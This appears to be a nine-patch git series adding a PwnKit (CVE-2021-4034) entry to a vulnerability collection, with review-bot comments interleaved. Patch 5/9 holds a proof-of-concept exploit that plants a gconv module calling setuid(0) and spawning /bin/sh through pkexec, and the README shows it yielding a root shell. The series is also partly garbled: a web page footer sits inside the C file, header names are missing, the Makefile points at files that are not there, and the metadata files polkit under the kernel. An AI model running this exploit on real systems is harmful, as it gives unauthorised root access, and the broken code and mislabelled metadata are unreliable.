From e5d4008abd5f05a30fab4c7b8191f8a54950dcf6 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:07:51 +0000
Subject: [PATCH 1/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-4034?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/linux-kernel/2021/CVE-2021-4034/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/.keep
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/.keep b/cve/linux-kernel/2021/CVE-2021-4034/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From a0a6e61e75a3e171f6fda5ead83da33d03d5bfcf Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:08:21 +0000
Subject: [PATCH 2/9] add cve/linux-kernel/2021/CVE-2021-4034.
Signed-off-by: caicaineng
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/README.md
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 09d1b473eafe92de4c9d72d59679950c6f930477 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:10:14 +0000
Subject: [PATCH 3/9] add cve/linux-kernel/2021/CVE-2021-4034.
Signed-off-by: caicaineng
-- Gitee
From db622b000fd41c55c0ef6edb035b67c8484def73 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:11:19 +0000
Subject: [PATCH 4/9] add cve/linux-kernel/2021/CVE-2021-4034/Makefile.
Signed-off-by: caicaineng
---
 cve/linux-kernel/2021/CVE-2021-4034/Makefile | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/Makefile
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/Makefile b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
new file mode 100644
index 00000000..6037d3b5
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
@@ -0,0 +1,14 @@
+CC = gcc
+
+EFLAGS = -Wall -Wextra -O2 -g -D_GNU_SOURCE
+SFLAGS = --shared -fPIC
+
+TARGET=exploit
+INCLUDE= include
+SOURCE= src
+
+all:
+ $(CC) $(SOURCE)/$(TARGET).c -o $(TARGET) $(EFLAGS) -I $(INCLUDE)
+ $(CC) $(SOURCE)/$(TARGET)-so.c -o $(TARGET).so $(EFLAGS) $(SFLAGS) -I $(INCLUDE)
+clean:
+ $(RM) -rf .sus $(TARGET)* GCONV_PATH=.
\ No newline at end of file
-- Gitee
From 880038b581cf7686ee8458acdc2a4f418edec8d7 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:12:09 +0000
Subject: [PATCH 5/9] add cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c.
Signed-off-by: caicaineng
---
 .../2021/CVE-2021-4034/cve-2021-4034-poc.c | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
new file mode 100644
index 00000000..6a5112bb
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
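Review bot: The `all` target builds `$(SOURCE)/$(TARGET).c` and `$(SOURCE)/$(TARGET)-so.c` from a `src/` tree with headers under `include/`, but nothing in this nine-patch series creates those paths; the only C source added (patch 5/9) is `cve-2021-4034-poc.c` beside the Makefile, so the `make` step that the README in patch 8/9 documents cannot succeed as committed. The `clean` target likewise removes `.sus`, which no recipe here produces. This suggests the Makefile and the PoC were taken from different upstream projects, and the series should say which; a header comment such as `# copied from <upstream repo URL> @ <commit>` (placeholders to be filled in) on the Makefile would let a later reviewer tell vendored content from local changes. If the `src/` and `include/` trees were simply left out, they need to be in the same series so the directory is self-consistent.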
@@ -0,0 +1,37 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include
+#include
+#include
+
+char *shell =
+ "#include \n"
+ "#include \n"
+ "#include \n\n"
+ "void gconv() {}\n"
+ "void gconv_init() {\n"
+ " setuid(0); setgid(0);\n"
+ " seteuid(0); setegid(0);\n"
+ " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+ " exit(0);\n"
+ "}";
+
+int main(int argc, char *argv[]) {
+ FILE *fp;
+ system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+ system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+ fp = fopen("pwnkit/pwnkit.c", "w");
+ fprintf(fp, "%s", shell);
+ fclose(fp);
+ system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+ char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+ execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}
+Footer
+© 2023 GitHub, Inc.
+Footer navigation
+Terms
+Privacy
+Security
-- Gitee
From 0dd0879ef402653a12e716180889448424d2a3ce Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:21:42 +0000
Subject: [PATCH 6/9] add cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml.
Signed-off-by: caicaineng
---
 cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
new file mode 100644
index 00000000..0c23bdc6
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
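Review bot: The last six lines of the new file (`Footer`, `© 2023 GitHub, Inc.`, `Footer navigation`, `Terms`, `Privacy`, `Security`) are a rendered GitHub page footer committed as source, and the three `#include` directives near the top carry no header name, as do the `"#include \n"` lines inside the `shell` string literal; these look like artefacts of copying from a web page rather than from the repository, and the file is not valid C as committed, so it cannot serve as a reproducible test artefact. The provenance is also inconsistent within the series: this header comment credits Andris Raugulis and the Qualys advisory, the README in patch 8/9 credits whokilleddb, and the Makefile in patch 4/9 expects `src/exploit.c` and `src/exploit-so.c`, which this file is not. For vendored PoC code the header should record the exact origin, e.g. `/* vendored verbatim from <upstream repo URL> @ <commit> */` with the placeholders filled in, and the committed bytes should match that revision so reviewers can diff against it. Note that the program's commands write into and delete from the current working directory (`GCONV_PATH=.`, `pwnkit`), so it should only ever be run from a scratch directory inside an isolated test VM.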
@@ -0,0 +1,17 @@
+id: CVE-2021-4034
+source: https://github.com/Anonymous-Family/CVE-2021-4034
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux Linux, A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
+ reference:
+ - https://www.anquanke.com/post/id/267774#h2-1
+ - https://nvd.nist.gov/vuln/detail/cve-2021-4034
+ - https://github.com/Anonymous-Family/CVE-2021-4034/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-4034
+ cwe-id: CWE-125
+ tags: cve2021,权限提升
\ No newline at end of file
-- Gitee
From 65cecf3df5194e2b4b72664ddc96710ba5917c66 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:22:54 +0000
Subject: [PATCH 7/9] update openkylin_list.yaml.
Signed-off-by: caicaineng
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index caeacc6e..23533074 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -31,6 +31,7 @@ cve:
 Influx-DB:
 - CVE-2019-20933
 linux-kernel:
+ - CVE-2021-4034
 - CVE-2021-4204
 - CVE-2021-22555
 - CVE-2021-4154
-- Gitee
From b11302887dd55d7a02b4daed118b2ee37ebc9517 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:26:04 +0000
Subject: [PATCH 8/9] update cve/linux-kernel/2021/CVE-2021-4034/README.md.
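Review bot: The `name` field describes the Linux kernel (`Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。`), but the `description` in the same entry attributes the flaw to polkit's setuid `pkexec` utility, which is a userspace package, not the kernel; the entry is also filed under `linux-kernel` both in its path and in the `openkylin_list.yaml` hunk that follows. Anyone using this metadata to decide which package to patch or which component to monitor would look at the wrong one, so `name` should name polkit/pkexec and the category should match, e.g. `name: polkit pkexec (PwnKit) local privilege escalation`. The `description` also opens with a stray `Linux Linux, ` that should be dropped. The `source` field points at a repository whose README (patch 8/9) credits whokilleddb, while the PoC committed in patch 5/9 credits Andris Raugulis; stating which one the vendored code actually came from keeps the record trustworthy.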
Signed-off-by: caicaineng
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
index e69de29b..b962cc91 100644
--- a/cve/linux-kernel/2021/CVE-2021-4034/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -0,0 +1,18 @@
+linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.
+
+
+Usage
+
+$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
+$ cd CVE-2021-4034
+$ make
+[!] CVE-2021-4034 Exploit By whokilleddb
+[!] Initializing Setup
+[+] Setup Done :D
+[!] Setting Root Privileges
+[!] Launching Root Shell
+# /bin/whoami
+root
+
+ref:https://github.com/Anonymous-Family/CVE-2021-4034
+
-- Gitee
From c229927a19fa50b759bac2662243787dee074b58 Mon Sep 17 00:00:00 2001
From: caicaineng
Date: Thu, 16 Mar 2023 12:26:51 +0000
Subject: [PATCH 9/9] update cve/linux-kernel/2021/CVE-2021-4034/README.md.
Signed-off-by: caicaineng
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 14 --------------
 1 file changed, 14 deletions(-)
diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
index b962cc91..3ad5c256 100644
--- a/cve/linux-kernel/2021/CVE-2021-4034/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -1,18 +1,4 @@ linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers. - -Usage - -$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git -$ cd CVE-2021-4034 -$ make -[!] CVE-2021-4034 Exploit By whokilleddb -[!] Initializing Setup -[+] Setup Done :D -[!] Setting Root Privileges -[!] Launching Root Shell -# /bin/whoami -root - ref:https://github.com/Anonymous-Family/CVE-2021-4034 -- Gitee